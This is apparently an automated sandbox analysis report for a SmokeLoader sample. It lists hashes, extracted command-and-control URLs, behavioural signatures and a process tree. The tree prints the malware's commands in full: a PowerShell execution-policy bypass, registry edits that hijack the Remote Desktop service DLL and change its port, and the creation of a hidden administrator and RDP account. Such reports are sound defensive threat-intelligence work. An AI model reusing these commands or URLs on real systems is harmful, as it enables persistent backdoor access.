Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
151s -
max time network
134s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
18/10/2021, 12:00
Static task
static1
Behavioral task
behavioral1
Sample
580fc5cd72d7979040fa1c4866ada3d0.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
580fc5cd72d7979040fa1c4866ada3d0.exe
Resource
win10-en-20210920
General
-
Target
580fc5cd72d7979040fa1c4866ada3d0.exe
-
Size
343KB
-
MD5
580fc5cd72d7979040fa1c4866ada3d0
-
SHA1
7da202d99be94f57f355c611bafde9656bca65b7
-
SHA256
42e7ef551c652a5e6f0ff919fcb53cd2c34682006cb1436295205a41abec6589
-
SHA512
b1be0be516e0d36c4b2e2f9e82e5cd94fecc86c39a4eee4494174f55e319a4c72d529e2aa097d3d466c5613df4106624fd689e6a1441e6be4a7bf9a15dc44815
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
flow pid Process 57 1624 powershell.exe 59 1624 powershell.exe 60 1624 powershell.exe 61 1624 powershell.exe 63 1624 powershell.exe 65 1624 powershell.exe 67 1624 powershell.exe 69 1624 powershell.exe 71 1624 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 4232 2F69.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000600000001abc7-359.dat upx behavioral2/files/0x000900000001abca-360.dat upx -
Deletes itself 1 IoCs
pid Process 3028 Process not Found -
Loads dropped DLL 2 IoCs
pid Process 3764 Process not Found 3764 Process not Found -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe -
Drops file in Windows directory 19 IoCs
description ioc Process File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7F22.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7F32.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ek2eyhek.sp3.psm1 powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_i2mytaak.zra.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7F11.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7EC1.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7EF1.tmp powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 580fc5cd72d7979040fa1c4866ada3d0.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 580fc5cd72d7979040fa1c4866ada3d0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 580fc5cd72d7979040fa1c4866ada3d0.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1100 reg.exe -
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 59 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 60 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 61 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 63 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4088 580fc5cd72d7979040fa1c4866ada3d0.exe 4088 580fc5cd72d7979040fa1c4866ada3d0.exe 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3028 Process not Found -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 628 Process not Found 628 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4088 580fc5cd72d7979040fa1c4866ada3d0.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4432 powershell.exe Token: SeDebugPrivilege 1784 powershell.exe Token: SeIncreaseQuotaPrivilege 1784 powershell.exe Token: SeSecurityPrivilege 1784 powershell.exe Token: SeTakeOwnershipPrivilege 1784 powershell.exe Token: SeLoadDriverPrivilege 1784 powershell.exe Token: SeSystemProfilePrivilege 1784 powershell.exe Token: SeSystemtimePrivilege 1784 powershell.exe Token: SeProfSingleProcessPrivilege 1784 powershell.exe Token: SeIncBasePriorityPrivilege 1784 powershell.exe Token: SeCreatePagefilePrivilege 1784 powershell.exe Token: SeBackupPrivilege 1784 powershell.exe Token: SeRestorePrivilege 1784 powershell.exe Token: SeShutdownPrivilege 1784 powershell.exe Token: SeDebugPrivilege 1784 powershell.exe Token: SeSystemEnvironmentPrivilege 1784 powershell.exe Token: SeRemoteShutdownPrivilege 1784 powershell.exe Token: SeUndockPrivilege 1784 powershell.exe Token: SeManageVolumePrivilege 1784 powershell.exe Token: 33 1784 powershell.exe Token: 34 1784 powershell.exe Token: 35 1784 powershell.exe Token: 36 1784 powershell.exe Token: SeDebugPrivilege 4860 powershell.exe Token: SeIncreaseQuotaPrivilege 4860 powershell.exe Token: SeSecurityPrivilege 4860 powershell.exe Token: SeTakeOwnershipPrivilege 4860 powershell.exe Token: SeLoadDriverPrivilege 4860 powershell.exe Token: SeSystemProfilePrivilege 4860 powershell.exe Token: SeSystemtimePrivilege 4860 powershell.exe Token: SeProfSingleProcessPrivilege 4860 powershell.exe Token: SeIncBasePriorityPrivilege 4860 powershell.exe Token: SeCreatePagefilePrivilege 4860 powershell.exe Token: SeBackupPrivilege 4860 powershell.exe Token: SeRestorePrivilege 4860 powershell.exe Token: SeShutdownPrivilege 4860 powershell.exe Token: SeDebugPrivilege 4860 powershell.exe Token: SeSystemEnvironmentPrivilege 4860 powershell.exe Token: SeRemoteShutdownPrivilege 4860 powershell.exe Token: SeUndockPrivilege 4860 powershell.exe Token: SeManageVolumePrivilege 4860 powershell.exe Token: 33 4860 powershell.exe Token: 34 4860 powershell.exe Token: 35 4860 powershell.exe Token: 36 4860 powershell.exe Token: SeDebugPrivilege 4920 powershell.exe Token: SeIncreaseQuotaPrivilege 4920 powershell.exe Token: SeSecurityPrivilege 4920 powershell.exe Token: SeTakeOwnershipPrivilege 4920 powershell.exe Token: SeLoadDriverPrivilege 4920 powershell.exe Token: SeSystemProfilePrivilege 4920 powershell.exe Token: SeSystemtimePrivilege 4920 powershell.exe Token: SeProfSingleProcessPrivilege 4920 powershell.exe Token: SeIncBasePriorityPrivilege 4920 powershell.exe Token: SeCreatePagefilePrivilege 4920 powershell.exe Token: SeBackupPrivilege 4920 powershell.exe Token: SeRestorePrivilege 4920 powershell.exe Token: SeShutdownPrivilege 4920 powershell.exe Token: SeDebugPrivilege 4920 powershell.exe Token: SeSystemEnvironmentPrivilege 4920 powershell.exe Token: SeRemoteShutdownPrivilege 4920 powershell.exe Token: SeUndockPrivilege 4920 powershell.exe Token: SeManageVolumePrivilege 4920 powershell.exe Token: 33 4920 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3028 Process not Found 3028 Process not Found -
Suspicious use of SendNotifyMessage 5 IoCs
pid Process 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found 3028 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3028 wrote to memory of 4232 3028 Process not Found 70 PID 3028 wrote to memory of 4232 3028 Process not Found 70 PID 4232 wrote to memory of 4432 4232 2F69.exe 73 PID 4232 wrote to memory of 4432 4232 2F69.exe 73 PID 4432 wrote to memory of 1168 4432 powershell.exe 75 PID 4432 wrote to memory of 1168 4432 powershell.exe 75 PID 1168 wrote to memory of 1256 1168 csc.exe 76 PID 1168 wrote to memory of 1256 1168 csc.exe 76 PID 4432 wrote to memory of 1784 4432 powershell.exe 77 PID 4432 wrote to memory of 1784 4432 powershell.exe 77 PID 4432 wrote to memory of 4860 4432 powershell.exe 80 PID 4432 wrote to memory of 4860 4432 powershell.exe 80 PID 4432 wrote to memory of 4920 4432 powershell.exe 82 PID 4432 wrote to memory of 4920 4432 powershell.exe 82 PID 4432 wrote to memory of 1048 4432 powershell.exe 84 PID 4432 wrote to memory of 1048 4432 powershell.exe 84 PID 4432 wrote to memory of 1100 4432 powershell.exe 85 PID 4432 wrote to memory of 1100 4432 powershell.exe 85 PID 4432 wrote to memory of 3464 4432 powershell.exe 86 PID 4432 wrote to memory of 3464 4432 powershell.exe 86 PID 4432 wrote to memory of 2108 4432 powershell.exe 87 PID 4432 wrote to memory of 2108 4432 powershell.exe 87 PID 2108 wrote to memory of 2224 2108 net.exe 88 PID 2108 wrote to memory of 2224 2108 net.exe 88 PID 4432 wrote to memory of 1700 4432 powershell.exe 89 PID 4432 wrote to memory of 1700 4432 powershell.exe 89 PID 1700 wrote to memory of 2948 1700 cmd.exe 90 PID 1700 wrote to memory of 2948 1700 cmd.exe 90 PID 2948 wrote to memory of 4492 2948 cmd.exe 91 PID 2948 wrote to memory of 4492 2948 cmd.exe 91 PID 4492 wrote to memory of 3160 4492 net.exe 92 PID 4492 wrote to memory of 3160 4492 net.exe 92 PID 4432 wrote to memory of 3608 4432 powershell.exe 93 PID 4432 wrote to memory of 3608 4432 powershell.exe 93 PID 3608 wrote to memory of 3192 3608 cmd.exe 94 PID 3608 wrote to memory of 3192 3608 cmd.exe 94 PID 3192 wrote to memory of 2404 3192 cmd.exe 95 PID 3192 wrote to memory of 2404 3192 cmd.exe 95 PID 2404 wrote to memory of 3052 2404 net.exe 96 PID 2404 wrote to memory of 3052 2404 net.exe 96 PID 5008 wrote to memory of 5056 5008 cmd.exe 100 PID 5008 wrote to memory of 5056 5008 cmd.exe 100 PID 5056 wrote to memory of 3828 5056 net.exe 101 PID 5056 wrote to memory of 3828 5056 net.exe 101 PID 3116 wrote to memory of 3564 3116 cmd.exe 104 PID 3116 wrote to memory of 3564 3116 cmd.exe 104 PID 3564 wrote to memory of 3664 3564 net.exe 105 PID 3564 wrote to memory of 3664 3564 net.exe 105 PID 3020 wrote to memory of 4080 3020 cmd.exe 108 PID 3020 wrote to memory of 4080 3020 cmd.exe 108 PID 4080 wrote to memory of 3936 4080 net.exe 109 PID 4080 wrote to memory of 3936 4080 net.exe 109 PID 4404 wrote to memory of 4164 4404 cmd.exe 112 PID 4404 wrote to memory of 4164 4404 cmd.exe 112 PID 4164 wrote to memory of 856 4164 net.exe 113 PID 4164 wrote to memory of 856 4164 net.exe 113 PID 356 wrote to memory of 1232 356 cmd.exe 116 PID 356 wrote to memory of 1232 356 cmd.exe 116 PID 1232 wrote to memory of 1392 1232 net.exe 117 PID 1232 wrote to memory of 1392 1232 net.exe 117 PID 1212 wrote to memory of 1584 1212 cmd.exe 120 PID 1212 wrote to memory of 1584 1212 cmd.exe 120 PID 1584 wrote to memory of 1668 1584 net.exe 121 PID 1584 wrote to memory of 1668 1584 net.exe 121
Processes
-
C:\Users\Admin\AppData\Local\Temp\580fc5cd72d7979040fa1c4866ada3d0.exe"C:\Users\Admin\AppData\Local\Temp\580fc5cd72d7979040fa1c4866ada3d0.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4088
-
C:\Users\Admin\AppData\Local\Temp\2F69.exeC:\Users\Admin\AppData\Local\Temp\2F69.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hh25b14x\hh25b14x.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES461D.tmp" "c:\Users\Admin\AppData\Local\Temp\hh25b14x\CSCDD0732B8F6904A22B1D567148B4DB08E.TMP"4⤵PID:1256
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1048
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1100
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:3464
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2224
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:3160
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3052
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2728
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2908
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:3828
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc agVLh50q /add1⤵
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc agVLh50q /add2⤵
- Suspicious use of WriteProcessMemory
PID:3564 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc agVLh50q /add3⤵PID:3664
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:3936
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:4404 -
